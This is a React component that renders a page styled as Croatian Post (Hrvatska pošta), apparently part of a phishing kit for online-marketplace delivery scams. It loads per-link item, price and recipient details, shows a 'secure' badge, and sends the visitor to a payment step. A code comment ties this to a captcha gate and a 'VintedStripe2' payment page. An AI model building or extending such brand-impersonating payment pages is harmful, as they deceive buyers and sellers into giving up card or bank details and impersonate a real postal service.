import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './HrPostaSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';
import { hrPostaSuccessCopy as t } from '../hrPostaSuccessCopy';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/hr-posta-logo.png`;
const STATUS_BANNER_SRC = `${process.env.PUBLIC_URL || ''}/hr-posta-status-banner.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function ShieldCheck() {
  return (
    <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M12 2l7 4v6c0 5-3.5 9.5-7 10-3.5-.5-7-5-7-10V6l7-4z" />
      <path d="M9 12l2 2 4-5" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

/**
 * Hrvatska pošta (HR) — success nakon captcha → index2 (VintedStripe2).
 */
function HrPostaSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'HR').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(Math.round(priceNumber))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const address = (pageData?.delivery_address || '').trim() || '—';
  const lastName = (pageData?.last_name || '').trim() || '—';
  const firstName = (pageData?.first_name || '').trim() || '—';
  const productName = (pageData?.product_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPhoto = Boolean(photoSrc && !imgFailed);

  if (loading && pageCode) {
    return (
      <div className="hrp-wrap">
        <header className="hrp-header">
          <img
            className="hrp-header-logo"
            src={LOGO_SRC}
            alt="Hrvatska pošta"
            width={246}
            height={92}
            decoding="async"
          />
        </header>
        <main className="hrp-main">
          <div className="hrp-loading">{t.loading}</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="hrp-wrap">
      <header className="hrp-header">
        <img
          className="hrp-header-logo"
          src={LOGO_SRC}
          alt="Hrvatska pošta"
          width={246}
          height={92}
          decoding="async"
        />
      </header>

      <main className="hrp-main">
        <h1 className="hrp-title">{t.pageTitle}</h1>

        <div className="hrp-topbar">
          {showPhoto ? (
            <img
              className="hrp-thumb-img"
              src={photoSrc}
              alt=""
              onError={() => setImgFailed(true)}
              decoding="async"
            />
          ) : (
            <div className="hrp-thumb" aria-hidden />
          )}
          <div className="hrp-topbar-text">
            <div className="hrp-amount-top">{amountLine}</div>
            <div className="hrp-product-name">{productName}</div>
          </div>
        </div>

        <div className="hrp-grid">
          <section className="hrp-card">
            <img
              className="hrp-status-img"
              src={STATUS_BANNER_SRC}
              alt={`${t.statusTitle} ${t.statusSub}`}
              width={1024}
              height={83}
              decoding="async"
            />

            <div className="hrp-section-h">{t.deliverySection}</div>

            <div className="hrp-field">
              <span className="hrp-field-label">{t.addressLabel}</span>
              <input className="hrp-input" readOnly value={address} />
            </div>

            <div className="hrp-split2">
              <div className="hrp-field">
                <span className="hrp-field-label">{t.lastName}</span>
                <input className="hrp-input" readOnly value={lastName} />
              </div>
              <div className="hrp-field">
                <span className="hrp-field-label">{t.firstName}</span>
                <input className="hrp-input" readOnly value={firstName} />
              </div>
            </div>

            <p className="hrp-legal">{t.legal1}</p>
            <p className="hrp-legal hrp-legal--second">{t.legal2}</p>
          </section>

          <aside className="hrp-card">
            <p className="hrp-right-amount">{amountLine}</p>
            <Link to={index2Path} className="hrp-btn">
              {t.cta}
            </Link>
            <div className="hrp-safe">
              <ShieldCheck />
              {t.secure}
            </div>
            <div className="hrp-right-legal">{t.disclaimer}</div>
          </aside>
        </div>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default HrPostaSuccess;
